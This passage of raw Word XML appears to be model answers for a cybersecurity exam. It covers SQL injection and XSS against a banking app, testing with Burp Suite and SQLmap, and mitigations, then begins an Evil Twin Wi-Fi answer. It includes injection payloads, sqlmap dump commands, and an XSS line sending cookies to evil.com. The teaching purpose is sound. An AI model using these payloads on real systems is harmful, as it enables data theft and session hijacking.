        <w:spacing w:after="150" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="B03030"/>
        </w:rPr>
        <w:t>(Marks: 20 — Understanding of Case: 5, Application of Concepts: 5, Analysis: 4, Solution Design: 4, Clarity: 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601A314C" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="252" w:line="286" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Case Scenario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> A financial services web application allows login, account viewing and transactions. A penetration test found it vulnerable to SQL injection and Cross-Site Scripting (XSS). Error messages expose database structure, and inputs are not sanitized, letting attackers extract customer data and inject scripts viewed by other users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E2274B" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>1. Understanding of the Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A5DA8" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="223"/>
        <w:ind w:left="160" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is a classic OWASP Top-10 scenario combining </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Injection (A03)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>broken input handling leading to XSS</w:t>
      </w:r>
      <w:r>
        <w:t>. The verbose error messages are an information-disclosure flaw that hands the attacker the database schema (table/column names), turning a blind attack into an easy, guided one. Because the same lack of sanitisation affects both back-end (SQL) and front-end (HTML/JS) contexts, the same root cause — missing input validation and output encoding — produces two very different, high-impact vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB7E813" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="152"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>2. How the Vulnerabilities Can Be Exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4EE5E9" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D700A6" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="54"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker enters a payload such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>' OR '1'='1' --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the login field, altering the SQL query logic to bypass authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3840B473" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Union-based injection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>' UNION SELECT username,password FROM users--</w:t>
      </w:r>
      <w:r>
        <w:t>) can be used once the number of columns is known (aided by the verbose error messages) to directly dump customer records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255778F2" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="241"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Error-based and blind/time-based techniques (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>' AND SLEEP(5)--</w:t>
      </w:r>
      <w:r>
        <w:t>) allow data extraction even when direct output is suppressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C7953C" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="93"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB4F6EA" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stored </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">XSS: </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">malicious </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7139DC" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="280" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.location='http://evil.com/?c='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C5985E" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="280" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>saved in a profile or transaction-note field executes for every user who views that page, stealing session cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68733A45" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Reflected XSS: a crafted URL containing a script parameter is sent via phishing email; when the victim clicks it, the script executes in their authenticated session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278F4707" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="349"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Both variants can be chained with session-hijacking to perform unauthorized transactions on behalf of the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA4A8D7" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="152"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Step-by-Step Testing Methodology (Burp Suite &amp; SQLmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE1D04" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Using Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC0549" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="92" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Configure the browser to route traffic through Burp Proxy and install the Burp CA certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC38B67" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="76" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Spider/Crawler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to map the application and identify all input points (login, search, transfer forms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C7A5A4" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Send requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Repeater</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to manually inject SQL meta-characters and XSS payloads and observe the application's response/error output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032A5967" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Intruder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a payload list (SQLi and XSS cheat-sheet strings) to automate fuzzing of every parameter and flag anomalous responses (errors, reflected payloads, timing differences).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB46936" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="244"/>
        <w:ind w:left="280" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Review the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Target &gt; Site map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the built-in scanner (Burp Pro) to confirm and document each confirmed vulnerability with request/response evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4634F737" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Using SQLmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FCC518" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="67"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capture a vulnerable request from Burp and export it, or run directly: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sqlmap -u "https://target/login" --data="user=a&amp;pass=a" --batch</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14222F9E" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="70"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumerate databases: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--dbs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; then tables: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-D bank --tables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; then columns/data: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-T customers --columns --dump</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E898AA6" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--risk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--level</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flags to control aggressiveness, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--technique=BEUST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to target specific injection types (boolean, error, union, stacked, time-based).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9902BA" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="349"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Document the exact injectable parameter, DBMS fingerprint, and extracted proof-of-concept data (never real customer data in a report – use redacted samples).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720AA6A8" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>4. Impact on the CIA Triad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA87C6F" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Confidentiality:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLi enables direct exfiltration of customer PII, account numbers and credentials; XSS enables session-cookie theft, indirectly exposing the same data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BA7C79" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Integrity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Attackers can modify or delete database records (e.g. UPDATE/DELETE via SQLi) or alter what other users see/submit via injected scripts, undermining trust in transaction data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446191C" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="350"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Destructive SQL statements (DROP TABLE) or heavy time-based blind queries can degrade or crash the database service, denying legitimate users access to banking functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DF0E9" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>5. Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334FD4CA" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Input Validation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Enforce strict, whitelist-based server-side validation on every field (type, length, format) in addition to client-side checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3216D" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Parameterized Queries / Prepared Statements:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Replace all dynamic SQL string concatenation with parameterized queries or a vetted ORM to eliminate SQLi structurally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4546167C" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Output Encoding:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Context-aware HTML/JS/URL encoding of all user-supplied data before rendering prevents XSS from executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD95C41" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Secure Session Handling:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Use HttpOnly, Secure and SameSite cookie flags, short session timeouts, and re-authentication for sensitive transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4EED9" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Generic Error Handling:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Replace verbose database errors with generic messages; log full details server-side only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3BCE61" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security Controls:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Deploy a WAF with SQLi/XSS rule sets, a Content-Security-Policy header, and conduct regular automated + manual penetration testing as part of the release cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A692706" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="275"/>
      </w:pPr>
      <w:r>
        <w:t>Question 3: Evil Twin Attack on Corporate WPA2-PSK Wireless Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0AC51B" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="B03030"/>
        </w:rPr>
        <w:t>(Marks: 20 — Understanding of Case: 5, Application of Concepts: 5, Analysis: 4, Solution Design: 4, Clarity: 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3871ED" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="252" w:line="286" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Case Scenario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> A corporate office provides Wi-Fi using WPA2-PSK. Employees reported unusual login prompts and slow network performance. Investigation revealed a rogue access point (Evil Twin) mimicking the official SSID, used to capture login credentials and perform man-in-the-middle (MITM) attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F77781F" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>1. Understanding of the Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5548342C" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="223"/>
        <w:ind w:left="160" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>An Evil Twin attack succeeds because 802.11 Wi-Fi clients trust an SSID name, not a cryptographically verified identity of the access point. WPA2-PSK uses a single shared passphrase known to every device, so a rogue AP broadcasting the same SSID (and often a stronger signal) looks identical to the legitimate network from the client's point of view. The symptoms — unusual login prompts and slow performance — indicate the rogue AP is running a captive-portal-style credential harvesting page and is relaying/inspecting live traffic, consistent with a full MITM position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E066003" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>2. How the Attack Was Executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659E3FBC" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reconnaissance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The attacker used a wireless adapter in monitor mode to identify the target SSID, its BSSID (MAC), channel and encryption type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FFF7AD" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rogue AP Setup:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A fake AP was created with the identical SSID (often using a Wi-Fi Pineapple, hostapd, or Wifiphisher), sometimes on an open/unencrypted configuration with a captive portal that mimics the corporate login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD5C4C" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Forced Disconnection:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Deauthentication frames were sent to legitimate clients (spoofing the real AP's MAC address) to disconnect them from the genuine network, nudging their devices to auto-reconnect to whichever AP has the same SSID and the strongest signal — the rogue AP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515AAF25" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Credential Harvesting / MITM:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Once connected, victims are shown a fake login/captive page that captures credentials, or their traffic is silently relayed through the attacker's machine, enabling packet sniffing, SSL-stripping, and session hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFDFFA0" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="350"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Data Interception:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Because the attacker's device sits between the victim and the internet, all unencrypted (and some poorly configured encrypted) traffic can be captured and analysed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11446728" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3. Detection and Analysis Using Kali Linux Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08362EB2" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Airmon-ng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Puts the wireless card into monitor mode (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>airmon-ng start wlan0</w:t>
      </w:r>
      <w:r>
        <w:t>) as the first step for any wireless assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AA08E1" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Airodump-ng:</w:t>
